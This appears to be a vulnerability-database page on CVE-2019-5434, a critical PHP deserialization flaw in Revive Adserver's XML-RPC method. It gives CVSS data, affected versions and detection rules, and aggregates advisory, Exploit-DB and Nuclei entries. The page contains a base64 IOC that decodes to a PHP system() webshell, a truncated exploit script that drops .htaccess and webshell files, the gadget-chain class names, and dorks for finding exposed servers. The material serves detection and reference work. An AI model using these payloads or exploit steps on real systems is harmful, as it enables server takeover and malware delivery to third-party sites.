CVE-2019-5434
published 2019-05-06CVE-2019-5434: An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the…
PriorityP187critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
57.02%
98.9th percentile
An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. Such vulnerability could be used to perform various types of attacks, e.g. exploit serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third party websites. This vulnerability was addressed in version 4.2.0.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| revive-sas | revive_adserver | < 4.2.0 | 4.2.0 |
| revive-sas | revive_adserver | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==
- →Detect POST requests to /adxmlrpc.php containing the string 'openads.spc' in the body, which indicates exploitation of the vulnerable XML-RPC method. ↗
- →Look for the serialized PHP object chain in POST body to /adxmlrpc.php containing class names 'Pdp\Uri\Url', 'League\Flysystem\File', 'League\Flysystem\MountManager', and 'League\Flysystem\Plugin\ForcedCopy' — these are the gadget chain classes used in exploitation. ↗
- →Alert on GET requests to /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php or doubleclick.class.php with query parameters, indicating a dropped webshell being accessed post-exploitation. ↗
- →Detect the presence of 'data:text/html;base64,' URI scheme within POST body to /adxmlrpc.php, used to smuggle the PHP webshell payload via the Flysystem MountManager gadget. ↗
- →Monitor for creation of unexpected .php files or .htaccess files under the plugins/ directory of Revive Adserver, as the exploit writes files to plugins/.htaccess and plugins/3rdPartyServers/ox3rdPartyServers/. ↗
- →Use the Google dork 'inurl:www/delivery filetype:php' or Shodan query 'http.favicon.hash:106844876' / title 'revive adserver' to identify exposed Revive Adserver instances for proactive scanning. ↗
- →The exploit uses Content-type: application/x-www-form-urlencoded for the POST to /adxmlrpc.php despite sending XML body — this header anomaly combined with XML content can be used as a detection signal. ↗
- ·The vulnerability exists in the 'what' parameter of the 'openads.spc' XML-RPC method, specifically because unserialize() is called on attacker-controlled input with no sanitization. The fix was introduced in version 4.2.0; instances running 4.1.x and earlier are vulnerable. ↗
- ·Active exploitation in the wild has been reported but not confirmed — attackers may have used this to deliver malware to third-party websites through compromised Revive Adserver instances. ↗
- ·The exploit gadget chain relies on the presence of specific PHP libraries (pdp/public-suffix-list, league/flysystem) in the target environment. Detection rules targeting the serialized class names are specific to this gadget chain and may not catch alternative chains. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7chh-x9j3-4vhx: An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in t
ghsa_unreviewed·2022-05-24
CVE-2019-5434 [CRITICAL] CWE-502 GHSA-7chh-x9j3-4vhx: An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in t
An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. Such vulnerability could be used to perform various types of attacks, e.g. exploit serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third party websites. This vulnerability was addressed in version 4.2.0.
VulnCheck
revive-sas revive_adserver Deserialization of Untrusted Data
vulncheck·2019·CVSS 9.8
CVE-2019-5434 [CRITICAL] revive-sas revive_adserver Deserialization of Untrusted Data
revive-sas revive_adserver Deserialization of Untrusted Data
An attacker could send a specifically crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. Such vulnerability could be used to perform various types of attacks, e.g. exploit serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third party websites. This vulnerability was addressed in version 4.2.0.
Affected: revive-sas revive_adserver
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if re
No detection rules found.
Exploit-DB
Revive Adserver 4.2 - Remote Code Execution
exploitdb·2019-12-03·CVSS 9.8
CVE-2019-5434 [CRITICAL] Revive Adserver 4.2 - Remote Code Execution
Revive Adserver 4.2 - Remote Code Execution
---
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution
# Google Dork: "inurl:www/delivery filetype:php"
# Exploit Author: crlf
# Vendor Homepage: https://www.revive-adserver.com/
# Software Link: https://www.revive-adserver.com/download/archive/
# Version: 4.1.x \'')) : @list($x, $url, $code) = $argv);
$source = 'data:text/html;base64,'.base64_encode('#');
$destination = 'plugins/.htaccess';
#$destination = 'var/.htaccess';
if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url));
$source = 'data:text/html;base64,'.base64_encode($code);
$destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php';
#$destination = 'var/default.conf.php';
request($u
Nuclei
Revive Adserver 4.2 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-5434 [CRITICAL] Revive Adserver 4.2 - Remote Code Execution
Revive Adserver 4.2 - Remote Code Execution
Revive Adserver 4.2 is susceptible to remote code execution. An attacker can send a crafted payload to the XML-RPC invocation script and trigger the unserialize() call on the "what" parameter in the "openads.spc" RPC method. This can be exploited to perform various types of attacks, e.g. serialize-related PHP vulnerabilities or PHP object injection. It is possible, although unconfirmed, that the vulnerability has been used by some attackers in order to gain access to some Revive Adserver instances and deliver malware through them to third-party websites.
Template:
id: CVE-2019-5434
info:
name: Revive Adserver 4.2 - Remote Code Execution
author: omarjezi
severity: critical
description: |
Revive Adserver 4.2 is susceptible to remote code execut
http://packetstormsecurity.com/files/155559/Revive-Adserver-4.2-Remote-Code-Execution.htmlhttps://hackerone.com/reports/512076https://hackerone.com/reports/542670https://www.revive-adserver.com/security/revive-sa-2019-001/http://packetstormsecurity.com/files/155559/Revive-Adserver-4.2-Remote-Code-Execution.htmlhttps://hackerone.com/reports/512076https://hackerone.com/reports/542670https://www.revive-adserver.com/security/revive-sa-2019-001/
2019-05-06
Published
Exploited in the wild